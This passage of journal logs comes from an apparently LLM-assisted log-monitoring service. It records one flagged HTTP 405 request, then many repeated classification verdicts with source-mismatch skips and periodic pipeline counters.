observer[1561913]: 2026/03/19 22:36:36.100580 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Web request returns HTTP 405 (method not allowed) to an unexpected endpoint (POST /) from an external client; could be probing or misconfigured client, not definitively malicious. 
Line=2026-03-19T22:36:34.110955292Z 35.222.125.2 - - [19/Mar/2026:22:36:34 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KH... Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.162193 [observer] Pipeline: processed=601 pattern_hits=323 llm_calls=277 llm_errors=5 learned=1 Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.162224 [observer] Patterns: hash=323 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=278 Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.690894 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.690928 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:39.948767 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:36:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:39.948890 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) running an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:42.629051 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:36:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:42.629088 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:45 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:36:45.940552 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:36:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:45.940613 [analyzer] Source hint mismatch: LLM says "docker container web access log (app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:48.746771 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:36:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:48.746802 [analyzer] Source hint mismatch: LLM says "docker container (web/app access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:51.849044 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:36:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:51.849084 [analyzer] Source hint mismatch: LLM says "dockerized web API (app logs endpoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:57.845836 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:36:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:57.845870 [analyzer] Source hint mismatch: LLM says "docker/captain web app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:00.767337 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe 
confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:00.767370 [analyzer] Source hint mismatch: LLM says "docker/http-access (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:04.017790 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:37:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:04.017827 [analyzer] Source hint mismatch: LLM says "docker/captain service (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.161562 [observer] Pipeline: processed=623 pattern_hits=336 llm_calls=286 llm_errors=5 learned=1 Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.161590 [observer] Patterns: hash=336 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=287 Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.882464 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.882500 [analyzer] Source hint mismatch: LLM says "dockerized web/API service (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:09.646789 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:37:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:09.646822 [analyzer] Source hint mismatch: LLM says "docker/captain containerized web service (API)", actual is 
"captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:12.954643 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:37:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:12.954678 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) running a web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:15.901982 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:15.902018 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:19.010374 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:37:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:19.010409 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:21.699807 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:37:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:21.699842 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:24 ip-172-26-12-110 observer[1561913]: 
2026/03/19 22:37:24.823472 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains Mar 19 22:37:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:24.823509 [analyzer] Source hint mismatch: LLM says "docker container web access log (app/api)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:25.964109 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:25.964152 [analyzer] Source hint mismatch: LLM says "docker/captain web app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:27.671720 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.60 action=suppress pattern_type=prefix Mar 19 22:37:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:27.671764 [analyzer] Source hint mismatch: LLM says "docker container access log (web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:30.731202 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:30.731234 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:33.627608 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: 
classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:37:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:33.627638 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web application access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.162733 [observer] Pipeline: processed=648 pattern_hits=350 llm_calls=297 llm_errors=5 learned=1 Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.162758 [observer] Patterns: hash=350 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=298 Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.743930 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.743968 [analyzer] Source hint mismatch: LLM says "docker container (web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:39.794131 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:37:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:39.794188 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:42.976916 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:42.976953 [analyzer] Source hint mismatch: LLM says "docker container access logs (API reverse 
proxy/app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:45.834363 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:37:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:45.834396 [analyzer] Source hint mismatch: LLM says "docker container access log (application/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:48.925130 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.78 action=suppress pattern_type=prefix Mar 19 22:37:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:48.925184 [analyzer] Source hint mismatch: LLM says "docker container web access log (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:51.696534 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.70 action=suppress pattern_type=prefix Mar 19 22:37:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:51.696569 [analyzer] Source hint mismatch: LLM says "docker container access logger (HTTP reverse proxy/app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:37:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:55.100919 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:37:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:55.100962 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 
22:37:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:57.681816 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:37:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:57.681853 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:00.563192 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=contains Mar 19 22:38:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:00.563233 [analyzer] Source hint mismatch: LLM says "docker container web/app access logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:03.694716 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:38:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:03.694755 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.161724 [observer] Pipeline: processed=671 pattern_hits=363 llm_calls=307 llm_errors=5 learned=1 Mar 19 22:38:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.161744 [observer] Patterns: hash=363 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=308 Mar 19 22:38:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.775737 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:38:06 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.775773 [analyzer] Source hint mismatch: LLM says "docker container web API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:09.813575 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:38:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:09.813611 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:12.628638 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:38:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:12.628672 [analyzer] Source hint mismatch: LLM says "docker container access/logs (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:15.694403 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:38:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:15.694452 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:18.753010 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:38:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:18.753052 [analyzer] Source hint mismatch: LLM says "docker 
container web/API (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:21.800503 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.72 action=suppress pattern_type=prefix Mar 19 22:38:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:21.800538 [analyzer] Source hint mismatch: LLM says "docker http access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:24.643683 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:38:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:24.643720 [analyzer] Source hint mismatch: LLM says "docker container (web/app behind docker)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:25.968966 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:38:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:25.969007 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (web API container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:27.759402 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:38:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:27.759440 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:30 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:30.751027 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:38:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:30.751065 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) running an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:33.835310 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:38:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:33.835350 [analyzer] Source hint mismatch: LLM says "docker container (web/API HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.163637 [observer] Pipeline: processed=695 pattern_hits=376 llm_calls=318 llm_errors=5 learned=1 Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.163663 [observer] Patterns: hash=376 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=319 Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.789301 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.789332 [analyzer] Source hint mismatch: LLM says "docker-captain (web/api container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:40.001909 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:38:40 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:40.001947 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:42.776035 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:38:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:42.776069 [analyzer] Source hint mismatch: LLM says "docker (container access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:45.588613 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:38:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:45.588651 [analyzer] Source hint mismatch: LLM says "docker container web/app access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:48.765337 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:38:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:48.765377 [analyzer] Source hint mismatch: LLM says "dockerized web API (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:51.985443 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:38:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:51.985481 [analyzer] Source hint mismatch: LLM says "docker 
container web/app access log (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:54.653778 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:38:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:54.653814 [analyzer] Source hint mismatch: LLM says "docker container access log / web app", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:38:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:57.843252 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:38:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:57.843288 [analyzer] Source hint mismatch: LLM says "docker-captain (web/app reverse proxy container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:00.628996 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:39:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:00.629033 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (HTTP access log from app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:03.735666 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:39:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:03.735706 [analyzer] Source hint mismatch: LLM says "docker container access logs / application web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — 
skipping pattern Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.162509 [observer] Pipeline: processed=719 pattern_hits=390 llm_calls=328 llm_errors=5 learned=1 Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.162530 [observer] Patterns: hash=390 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=329 Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.744221 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.744256 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:09.689269 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:39:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:09.689307 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:12.778825 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:39:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:12.778862 [analyzer] Source hint mismatch: LLM says "docker/captain web access logs (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:16.022231 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:39:16 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:16.022271 [analyzer] Source hint mismatch: LLM says "docker/captain web API access log (application)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:18.872377 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:39:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:18.872415 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:21.747774 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:39:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:21.747810 [analyzer] Source hint mismatch: LLM says "docker container web/api access logs", actual is 